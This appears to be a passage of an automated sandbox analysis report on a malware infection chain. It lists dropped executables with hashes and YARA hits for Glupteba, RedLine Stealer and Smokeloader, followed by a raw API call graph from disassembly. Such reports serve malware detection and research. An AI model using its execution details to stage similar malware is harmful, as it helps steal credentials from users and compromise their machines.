                                                                                                                                                                                                                                Start time:21:37:31
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\68bEfZA6FBu6lC5BaADYSIdx.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\68bEfZA6FBu6lC5BaADYSIdx.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:4'405'128 bytes
                                                                                                                                                                                                                                MD5 hash:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000026.00000001.2017532049.0000000000843000.00000040.00000001.01000000.0000001D.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:39
                                                                                                                                                                                                                                Start time:21:37:31
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:473'089 bytes
                                                                                                                                                                                                                                MD5 hash:CCEE6D525CB5940F123C86DB6EDD40DA
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000027.00000002.2175970589.000000000418C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000027.00000003.2086147863.0000000006A37000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000027.00000002.2184889083.0000000004440000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:40
                                                                                                                                                                                                                                Start time:21:37:31
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff68dea0000
                                                                                                                                                                                                                                File size:4'407'808 bytes
                                                                                                                                                                                                                                MD5 hash:3953BBAD77CDCB9D5AF2694EED7E6688
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:41
                                                                                                                                                                                                                                Start time:21:37:31
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:473'089 bytes
                                                                                                                                                                                                                                MD5 hash:CCEE6D525CB5940F123C86DB6EDD40DA
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000029.00000002.2099601729.00000000041B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000029.00000003.2080394798.0000000006A3A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000029.00000002.2100222351.00000000043EC000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:42
                                                                                                                                                                                                                                Start time:21:37:33
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe" --silent --allusers=0
                                                                                                                                                                                                                                Imagebase:0xfd0000
                                                                                                                                                                                                                                File size:5'387'648 bytes
                                                                                                                                                                                                                                MD5 hash:409B00F4B0A921D4691FE3EFB0AD4092
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:43
                                                                                                                                                                                                                                Start time:21:37:34
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\OYqxk9G3x4R05N4I0KLZXbXg.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\OYqxk9G3x4R05N4I0KLZXbXg.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:4'405'128 bytes
                                                                                                                                                                                                                                MD5 hash:F6C9E6F8396274E57FBA6BE593B90E36
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000002B.00000001.1972234564.0000000000843000.00000040.00000001.01000000.00000022.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:44
                                                                                                                                                                                                                                Start time:21:37:35
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe" --silent --allusers=0
                                                                                                                                                                                                                                Imagebase:0x480000
                                                                                                                                                                                                                                File size:5'387'648 bytes
                                                                                                                                                                                                                                MD5 hash:2CF99CA2E0CB98555FCA7D2FB3187553
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:45
                                                                                                                                                                                                                                Start time:21:37:35
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exe
                                                                                                                                                                                                                                Imagebase:0xd80000
                                                                                                                                                                                                                                File size:3'679'520 bytes
                                                                                                                                                                                                                                MD5 hash:A1789F6DBB08B8F49452DB52D3829002
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:46
                                                                                                                                                                                                                                Start time:21:37:35
                                                                                                                                                                                                                                Start date:23/04/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exe
                                                                                                                                                                                                                                Imagebase:0x9a0000
                                                                                                                                                                                                                                File size:5'077'008 bytes
                                                                                                                                                                                                                                MD5 hash:D15459E9B9D12244A57809BC383B2757
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:5.9%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                  Signature Coverage:30.9%
                                                                                                                                                                                                                                  Total number of Nodes:828
                                                                                                                                                                                                                                  Total number of Limit Nodes:17
                                                                                                                                                                                                                                  execution_graph 18722 7ff6385c69e0 18723 7ff6385c6a0b _swprintf_c_l 18722->18723 18725 7ff6385c6a36 18723->18725 18726 7ff6385c6a90 18723->18726 18727 7ff6385c6b1f 18726->18727 18728 7ff6385c6aa8 18726->18728 18729 7ff6385c6b3f 18727->18729 18730 7ff6385c6b26 18727->18730 18731 7ff6385c6b06 18728->18731 18736 7ff6385c6ac8 18728->18736 18737 7ff6385c6ae7 18728->18737 18733 7ff6385c6b6f 18729->18733 18750 7ff6385c66f0 GetLastError 18729->18750 18747 7ff6385cca50 18730->18747 18741 7ff6385c70c0 18731->18741 18733->18725 18735 7ff6385c6b32 RaiseFailFastException 18735->18729 18739 7ff6385c6ad0 Sleep 18736->18739 18737->18731 18740 7ff6385c6af9 RaiseFailFastException 18737->18740 18739->18737 18739->18739 18740->18731 18742 7ff6385c70e8 _swprintf_c_l 18741->18742 18743 7ff6385c7111 18742->18743 18753 7ff6385cc5c0 FlsGetValue 18742->18753 18743->18727 18745 7ff6385c7109 18746 7ff6385c5d20 7 API calls 18745->18746 18746->18743 18748 7ff6385cca64 18747->18748 18748->18748 18749 7ff6385cca6d GetStdHandle WriteFile 18748->18749 18749->18735 18751 7ff6385c6720 18750->18751 18752 7ff6385c6746 SetLastError 18751->18752 18754 7ff6385cc5da RaiseFailFastException 18753->18754 18755 7ff6385cc5e8 FlsSetValue 18753->18755 18754->18755 18885 7ff6385c6f90 18895 7ff6385cc8a0 FlsAlloc 18885->18895 18887 7ff6385c6f99 18888 7ff6385c6fc1 18887->18888 18908 7ff6385cc7d0 GetModuleHandleExW 18887->18908 18890 7ff6385c6fa9 18909 7ff6385c6e20 18890->18909 18896 7ff6385cc9ee 18895->18896 18897 7ff6385cc8c0 18895->18897 18896->18887 18937 7ff6385d5950 18897->18937 18899 7ff6385cc8c5 18900 7ff6385d46f0 10 API calls 18899->18900 18901 7ff6385cc8ca 18900->18901 18901->18896 18902 7ff6385d0580 9 API calls 18901->18902 18903 7ff6385cc8f2 18902->18903 18904 7ff6385cc911 18903->18904 18905 7ff6385cc91a GetCurrentProcess GetProcessAffinityMask 18903->18905 18907 7ff6385cc988 18903->18907 18906 7ff6385cc964 QueryInformationJobObject 18904->18906 18905->18904 18906->18907 18907->18887 18908->18890 19098 7ff6385c90b0 18909->19098 18911 7ff6385c6e2e 18912 7ff6385c6f64 18911->18912 19106 7ff6385ce880 18911->19106 18912->18888 18933 7ff6385cf8f0 18912->18933 18916 7ff6385c6e4b 18916->18912 18917 7ff6385c6e73 RtlAddVectoredExceptionHandler 18916->18917 18918 7ff6385c6e87 18917->18918 18919 7ff6385c6e8c 18917->18919 18921 7ff6385c6ec0 18918->18921 18922 7ff6385d0580 9 API calls 18918->18922 18920 7ff6385d0580 9 API calls 18919->18920 18920->18918 18923 7ff6385c6f1a 18921->18923 19115 7ff6385cf420 18921->19115 18922->18921 19122 7ff6385cb560 18923->19122 18926 7ff6385c6f1f 18926->18912 19136 7ff6385c6be0 18926->19136 18934 7ff6385d04cd 18933->18934 19448 7ff6385cc7d0 GetModuleHandleExW 18934->19448 18936 7ff6385c6fba 19066 7ff6385cb130 18937->19066 18940 7ff6385cb130 9 API calls 18941 7ff6385d598e 18940->18941 18942 7ff6385cb130 9 API calls 18941->18942 18943 7ff6385d59a9 18942->18943 18944 7ff6385cb130 9 API calls 18943->18944 18945 7ff6385d59c4 18944->18945 18946 7ff6385cb130 9 API calls 18945->18946 18947 7ff6385d59e4 18946->18947 18948 7ff6385cb130 9 API calls 18947->18948 18949 7ff6385d59ff 18948->18949 18950 7ff6385cb130 9 API calls 18949->18950 18951 7ff6385d5a1f 18950->18951 18952 7ff6385cb130 9 API calls 18951->18952 18953 7ff6385d5a3a 18952->18953 18954 7ff6385cb130 9 API calls 18953->18954 18955 7ff6385d5a55 18954->18955 18956 7ff6385cb130 9 API calls 18955->18956 18957 7ff6385d5a70 18956->18957 18958 7ff6385cb130 9 API calls 18957->18958 18959 7ff6385d5a90 18958->18959 18960 7ff6385cb130 9 API calls 18959->18960 18961 7ff6385d5ab0 18960->18961 19072 7ff6385cb330 18961->19072 18964 7ff6385cb330 9 API calls 18965 7ff6385d5ae0 18964->18965 18966 7ff6385cb330 9 API calls 18965->18966 18967 7ff6385d5af5 18966->18967 18968 7ff6385cb330 9 API calls 18967->18968 18969 7ff6385d5b0a 18968->18969 18970 7ff6385cb330 9 API calls 18969->18970 18971 7ff6385d5b1f 18970->18971 18972 7ff6385cb330 9 API calls 18971->18972 18973 7ff6385d5b39 18972->18973 18974 7ff6385cb330 9 API calls 18973->18974 18975 7ff6385d5b4e 18974->18975 18976 7ff6385cb330 9 API calls 18975->18976 18977 7ff6385d5b63 18976->18977 18978 7ff6385cb330 9 API calls 18977->18978 18979 7ff6385d5b78 18978->18979 18980 7ff6385cb330 9 API calls 18979->18980 18981 7ff6385d5b8d 18980->18981 18982 7ff6385cb330 9 API calls 18981->18982 18983 7ff6385d5ba2 18982->18983 18984 7ff6385cb330 9 API calls 18983->18984 18985 7ff6385d5bb7 18984->18985 18986 7ff6385cb330 9 API calls 18985->18986 18987 7ff6385d5bd1 18986->18987 18988 7ff6385cb330 9 API calls 18987->18988 18989 7ff6385d5beb 18988->18989 18990 7ff6385cb330 9 API calls 18989->18990 18991 7ff6385d5c00 18990->18991 18992 7ff6385cb330 9 API calls 18991->18992 18993 7ff6385d5c15 18992->18993 18994 7ff6385cb330 9 API calls 18993->18994 18995 7ff6385d5c2a 18994->18995 18996 7ff6385cb330 9 API calls 18995->18996 18997 7ff6385d5c3f 18996->18997 18998 7ff6385cb330 9 API calls 18997->18998 18999 7ff6385d5c59 18998->18999 19000 7ff6385cb330 9 API calls 18999->19000 19001 7ff6385d5c73 19000->19001 19002 7ff6385cb330 9 API calls 19001->19002 19003 7ff6385d5c88 19002->19003 19004 7ff6385cb330 9 API calls 19003->19004 19005 7ff6385d5c9d 19004->19005 19006 7ff6385cb330 9 API calls 19005->19006 19007 7ff6385d5cb2 19006->19007 19008 7ff6385cb330 9 API calls 19007->19008 19009 7ff6385d5cc7 19008->19009 19010 7ff6385cb330 9 API calls 19009->19010 19011 7ff6385d5cdc 19010->19011 19012 7ff6385cb330 9 API calls 19011->19012 19013 7ff6385d5cf1 19012->19013 19014 7ff6385cb330 9 API calls 19013->19014 19015 7ff6385d5d06 19014->19015 19016 7ff6385cb330 9 API calls 19015->19016 19017 7ff6385d5d1b 19016->19017 19018 7ff6385cb330 9 API calls 19017->19018 19019 7ff6385d5d30 19018->19019 19020 7ff6385cb330 9 API calls 19019->19020 19021 7ff6385d5d45 19020->19021 19022 7ff6385cb330 9 API calls 19021->19022 19023 7ff6385d5d5a 19022->19023 19024 7ff6385cb330 9 API calls 19023->19024 19025 7ff6385d5d6f 19024->19025 19026 7ff6385cb330 9 API calls 19025->19026 19027 7ff6385d5d84 19026->19027 19028 7ff6385cb330 9 API calls 19027->19028 19029 7ff6385d5d99 19028->19029 19030 7ff6385cb330 9 API calls 19029->19030 19031 7ff6385d5dae 19030->19031 19032 7ff6385cb330 9 API calls 19031->19032 19033 7ff6385d5dc3 19032->19033 19034 7ff6385cb330 9 API calls 19033->19034 19035 7ff6385d5dd8 19034->19035 19036 7ff6385cb330 9 API calls 19035->19036 19037 7ff6385d5ded 19036->19037 19038 7ff6385cb330 9 API calls 19037->19038 19039 7ff6385d5e02 19038->19039 19040 7ff6385cb330 9 API calls 19039->19040 19041 7ff6385d5e17 19040->19041 19042 7ff6385cb330 9 API calls 19041->19042 19043 7ff6385d5e2c 19042->19043 19044 7ff6385cb330 9 API calls 19043->19044 19045 7ff6385d5e41 19044->19045 19046 7ff6385cb330 9 API calls 19045->19046 19047 7ff6385d5e56 19046->19047 19048 7ff6385cb330 9 API calls 19047->19048 19049 7ff6385d5e70 19048->19049 19050 7ff6385cb330 9 API calls 19049->19050 19051 7ff6385d5e8a 19050->19051 19052 7ff6385cb330 9 API calls 19051->19052 19053 7ff6385d5ea4 19052->19053 19054 7ff6385cb330 9 API calls 19053->19054 19055 7ff6385d5ebe 19054->19055 19056 7ff6385cb330 9 API calls 19055->19056 19057 7ff6385d5ed8 19056->19057 19058 7ff6385cb330 9 API calls 19057->19058 19059 7ff6385d5ef2 19058->19059 19060 7ff6385cb330 9 API calls 19059->19060 19061 7ff6385d5f07 19060->19061 19062 7ff6385cb330 9 API calls 19061->19062 19063 7ff6385d5f21 19062->19063 19064 7ff6385cb330 9 API calls 19063->19064 19065 7ff6385d5f36 19064->19065 19071 7ff6385cb163 19066->19071 19070 7ff6385cb167 19084 7ff63862abf0 19070->19084 19071->19070 19071->19071 19078 7ff6385d0580 19071->19078 19073 7ff6385cb360 19072->19073 19074 7ff6385d0580 9 API calls 19073->19074 19075 7ff6385cb4b8 19074->19075 19076 7ff63862abf0 8 API calls 19075->19076 19077 7ff6385cb4d0 19076->19077 19077->18964 19081 7ff6385d05f0 19078->19081 19079 7ff63862abf0 8 API calls 19082 7ff6385d076d 19079->19082 19080 7ff6385d0670 _wcsicmp 19080->19081 19083 7ff6385d068d 19080->19083 19081->19080 19081->19083 19082->19070 19083->19079 19085 7ff63862abf9 19084->19085 19086 7ff63862b548 IsProcessorFeaturePresent 19085->19086 19087 7ff6385cb2de 19085->19087 19088 7ff63862b560 19086->19088 19087->18940 19093 7ff63862b61c RtlCaptureContext 19088->19093 19094 7ff63862b636 RtlLookupFunctionEntry 19093->19094 19095 7ff63862b64c RtlVirtualUnwind 19094->19095 19096 7ff63862b573 19094->19096 19095->19094 19095->19096 19097 7ff63862b514 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 19096->19097 19099 7ff63862ab44 _swprintf_c_l 3 API calls 19098->19099 19100 7ff6385c90c5 19099->19100 19101 7ff6385c9104 19100->19101 19145 7ff6385d1d80 19100->19145 19101->18911 19103 7ff6385c90d2 19103->19101 19104 7ff6385ced90 InitializeCriticalSectionEx 19103->19104 19105 7ff6385c90fd 19104->19105 19105->18911 19107 7ff6385ced90 InitializeCriticalSectionEx 19106->19107 19108 7ff6385c6e3b 19107->19108 19108->18912 19109 7ff6385c5550 19108->19109 19110 7ff63862ab44 _swprintf_c_l 3 API calls 19109->19110 19112 7ff6385c556e 19110->19112 19111 7ff6385c5615 19111->18916 19112->19111 19148 7ff6385c7230 19112->19148 19114 7ff6385c55ab 19114->18916 19116 7ff6385cf533 19115->19116 19117 7ff6385cf44b 19115->19117 19116->18923 19118 7ff63862ab44 _swprintf_c_l 3 API calls 19117->19118 19119 7ff6385cf46f 19118->19119 19120 7ff6385ced90 InitializeCriticalSectionEx 19119->19120 19121 7ff6385cf4a2 QueryPerformanceFrequency GetSystemTimeAsFileTime QueryPerformanceCounter 19120->19121 19121->19116 19123 7ff63862a4e3 19122->19123 19124 7ff6385cb595 EventRegister 19123->19124 19125 7ff6385ced90 InitializeCriticalSectionEx 19124->19125 19126 7ff6385cb60b 19125->19126 19151 7ff6385cc040 19126->19151 19129 7ff6385cb64e 19129->18926 19130 7ff6385cb62a 19130->19129 19167 7ff6385c8d60 19130->19167 19132 7ff6385cb633 19132->19129 19174 7ff6385cd450 19132->19174 19133 7ff6385cb643 19133->18926 19137 7ff6385c6ce5 19136->19137 19141 7ff6385c6c04 19136->19141 19138 7ff6385c6e0f 19137->19138 19139 7ff6385cca50 2 API calls 19137->19139 19138->18912 19143 7ff6385ced90 19138->19143 19140 7ff6385c6e02 RaiseFailFastException 19139->19140 19140->19138 19141->19137 19445 7ff6385cca00 LoadLibraryExW 19141->19445 19144 7ff63862a7a1 InitializeCriticalSectionEx 19143->19144 19146 7ff6385ced90 InitializeCriticalSectionEx 19145->19146 19147 7ff6385d1dcc 19146->19147 19147->19103 19149 7ff63862ab44 _swprintf_c_l 3 API calls 19148->19149 19150 7ff6385c724e 19149->19150 19150->19114 19181 7ff6385d3d20 19151->19181 19153 7ff6385cb616 19153->19129 19154 7ff6385db020 19153->19154 19192 7ff6385d48e0 QueryPerformanceFrequency 19154->19192 19156 7ff6385db030 19158 7ff6385db0d2 19156->19158 19193 7ff6385d4230 19156->19193 19166 7ff6385db344 19158->19166 19207 7ff6385f2050 19158->19207 19160 7ff6385db4df 19161 7ff63862ab44 _swprintf_c_l 3 API calls 19160->19161 19160->19166 19162 7ff6385db61d 19161->19162 19162->19166 19236 7ff6385d3e70 19162->19236 19164 7ff6385db640 19164->19166 19241 7ff6385f0ae0 19164->19241 19166->19130 19168 7ff6385c8d72 19167->19168 19169 7ff6385c8dad 19168->19169 19425 7ff6385d1c10 CreateEventW 19168->19425 19169->19132 19171 7ff6385c8d84 19171->19169 19426 7ff6385ccb30 CreateThread 19171->19426 19173 7ff6385c8da3 19173->19132 19175 7ff6385cd467 19174->19175 19176 7ff6385cd46f 19175->19176 19177 7ff63862ab44 _swprintf_c_l 3 API calls 19175->19177 19176->19133 19179 7ff6385cd4a1 19177->19179 19180 7ff6385cd535 19179->19180 19429 7ff6385d6240 19179->19429 19180->19133 19186 7ff6385d6b30 19181->19186 19184 7ff6385d3d5f 19184->19153 19187 7ff63862ab44 _swprintf_c_l 3 API calls 19186->19187 19188 7ff6385d3d48 19187->19188 19188->19184 19189 7ff6385d8690 19188->19189 19190 7ff63862ab44 _swprintf_c_l 3 API calls 19189->19190 19191 7ff6385d86a5 19190->19191 19191->19184 19192->19156 19194 7ff6385d4253 19193->19194 19195 7ff6385d43a4 19194->19195 19196 7ff6385d4267 GetCurrentProcess IsProcessInJob 19194->19196 19199 7ff6385d43f2 GlobalMemoryStatusEx 19195->19199 19200 7ff6385d43e8 19195->19200 19197 7ff6385d4363 19196->19197 19198 7ff6385d42bc 19196->19198 19197->19195 19202 7ff6385d437b GlobalMemoryStatusEx 19197->19202 19198->19197 19201 7ff6385d42c6 QueryInformationJobObject 19198->19201 19199->19200 19203 7ff63862abf0 8 API calls 19200->19203 19201->19197 19204 7ff6385d42e8 19201->19204 19202->19195 19205 7ff6385d4434 19203->19205 19204->19197 19206 7ff6385d432c GlobalMemoryStatusEx 19204->19206 19205->19158 19206->19197 19266 7ff6385d4940 VirtualAlloc 19207->19266 19209 7ff6385f2078 19212 7ff6385f20e4 19209->19212 19350 7ff6385d46d0 InitializeCriticalSection 19209->19350 19269 7ff6385fd210 19212->19269 19213 7ff6385f213f 19235 7ff6385f2358 19213->19235 19301 7ff6385f1e40 19213->19301 19215 7ff6385f2253 19305 7ff6385ef4b0 19215->19305 19219 7ff6385f2299 19220 7ff6385f22b5 EnterCriticalSection 19219->19220 19221 7ff6385f2302 19219->19221 19219->19235 19222 7ff6385f22d1 19220->19222 19223 7ff6385f22de LeaveCriticalSection 19220->19223 19224 7ff6385d4980 3 API calls 19221->19224 19222->19223 19225 7ff6385f2341 LeaveCriticalSection 19222->19225 19223->19221 19226 7ff6385f2313 19224->19226 19227 7ff6385f234d 19225->19227 19228 7ff6385f2317 19226->19228 19231 7ff6385f2382 19226->19231 19351 7ff6385d4a30 VirtualFree 19227->19351 19228->19227 19230 7ff6385f2320 EnterCriticalSection 19228->19230 19230->19225 19231->19235 19312 7ff638604be0 19231->19312 19235->19160 19237 7ff63862ab44 _swprintf_c_l 3 API calls 19236->19237 19238 7ff6385d3e96 19237->19238 19239 7ff6385d3e9e CreateEventW 19238->19239 19240 7ff6385d3ec0 19238->19240 19239->19240 19240->19164 19242 7ff6385f0b66 _swprintf_c_l 19241->19242 19243 7ff6385d3e70 4 API calls 19242->19243 19244 7ff6385f0b74 19243->19244 19245 7ff6385f1567 19244->19245 19412 7ff6385d48c0 QueryPerformanceCounter 19244->19412 19245->19166 19247 7ff6385f0b92 19413 7ff6385f3ff0 19247->19413 19249 7ff6385f0eb7 19249->19245 19250 7ff6385f3ff0 7 API calls 19249->19250 19251 7ff6385f0f50 19250->19251 19251->19245 19252 7ff6385f3ff0 7 API calls 19251->19252 19253 7ff6385f0fc4 19252->19253 19253->19245 19254 7ff6385f4180 2 API calls 19253->19254 19255 7ff6385f114e 19253->19255 19254->19253 19255->19245 19256 7ff63862ab44 _swprintf_c_l 3 API calls 19255->19256 19257 7ff6385f13ca 19256->19257 19257->19245 19258 7ff6385f142d 19257->19258 19259 7ff6385f1416 19257->19259 19260 7ff63862ab44 _swprintf_c_l 3 API calls 19258->19260 19259->19245 19261 7ff6385f1423 DebugBreak 19259->19261 19262 7ff6385f1479 19260->19262 19261->19245 19262->19245 19263 7ff63862ab44 _swprintf_c_l 3 API calls 19262->19263 19264 7ff6385f1506 19263->19264 19264->19245 19424 7ff6385d46d0 InitializeCriticalSection 19264->19424 19267 7ff6385d4961 VirtualFree 19266->19267 19268 7ff6385d4979 19266->19268 19267->19209 19268->19209 19287 7ff6385fd278 19269->19287 19270 7ff6385fdc45 19270->19213 19272 7ff6385fd85d 19273 7ff638602090 22 API calls 19272->19273 19274 7ff6385fd88e 19273->19274 19276 7ff638602090 22 API calls 19274->19276 19275 7ff6385fd771 19275->19272 19277 7ff6385d4a50 3 API calls 19275->19277 19280 7ff6385fd852 19275->19280 19294 7ff6385fd588 19275->19294 19278 7ff6385fd8a8 19276->19278 19279 7ff6385fd7ee 19277->19279 19282 7ff638602090 22 API calls 19278->19282 19279->19280 19279->19294 19363 7ff6385d4a30 VirtualFree 19279->19363 19364 7ff6385d4a30 VirtualFree 19280->19364 19285 7ff6385fd9ac 19282->19285 19284 7ff6385d4980 3 API calls 19284->19294 19286 7ff6385fdabe 19285->19286 19285->19294 19365 7ff6385d4a30 VirtualFree 19285->19365 19288 7ff6385fdae9 19286->19288 19366 7ff6385d4a30 VirtualFree 19286->19366 19287->19270 19289 7ff638602090 22 API calls 19287->19289 19293 7ff6385fd63c 19287->19293 19287->19294 19295 7ff6385fd5d4 19287->19295 19298 7ff6385fdb0f 19288->19298 19367 7ff6385d4a30 VirtualFree 19288->19367 19289->19287 19352 7ff638602090 19293->19352 19294->19270 19294->19284 19295->19293 19362 7ff6385d4a30 VirtualFree 19295->19362 19297 7ff638602090 22 API calls 19297->19298 19298->19270 19298->19294 19298->19297 19299 7ff6385fdc49 19298->19299 19299->19270 19368 7ff6385d4a30 VirtualFree 19299->19368 19303 7ff6385f1e5f 19301->19303 19304 7ff6385f1e7c 19303->19304 19381 7ff6385d3f30 19303->19381 19304->19215 19306 7ff6385ef512 19305->19306 19307 7ff63862abf0 8 API calls 19306->19307 19308 7ff6385ef62c 19307->19308 19309 7ff6385d4a50 19308->19309 19310 7ff6385d4a94 GetCurrentProcess VirtualAllocExNuma 19309->19310 19311 7ff6385d4a75 VirtualAlloc 19309->19311 19310->19219 19311->19310 19388 7ff638604af0 19312->19388 19315 7ff6385f17b0 19322 7ff6385f17e0 19315->19322 19316 7ff6385f1e0b 19410 7ff6385d3dd0 CloseHandle 19316->19410 19317 7ff6385f1e17 19319 7ff6385f1e20 19317->19319 19320 7ff6385f1e2c 19317->19320 19411 7ff6385d3dd0 CloseHandle 19319->19411 19320->19235 19323 7ff6385d3e70 4 API calls 19322->19323 19348 7ff6385f183f 19322->19348 19324 7ff6385f1886 19323->19324 19325 7ff6385d3e70 4 API calls 19324->19325 19324->19348 19326 7ff6385f189c _swprintf_c_l 19325->19326 19326->19348 19394 7ff6385d4050 19326->19394 19328 7ff6385f1bfd 19329 7ff6385d3e70 4 API calls 19328->19329 19330 7ff6385f1c7a 19329->19330 19331 7ff6385f1cbc 19330->19331 19334 7ff6385d3e70 4 API calls 19330->19334 19332 7ff6385f1dc3 19331->19332 19333 7ff6385f1db7 19331->19333 19331->19348 19336 7ff6385f1dcc 19332->19336 19337 7ff6385f1dd8 19332->19337 19406 7ff6385d3dd0 CloseHandle 19333->19406 19338 7ff6385f1c90 19334->19338 19407 7ff6385d3dd0 CloseHandle 19336->19407 19340 7ff6385f1de1 19337->19340 19341 7ff6385f1ded 19337->19341 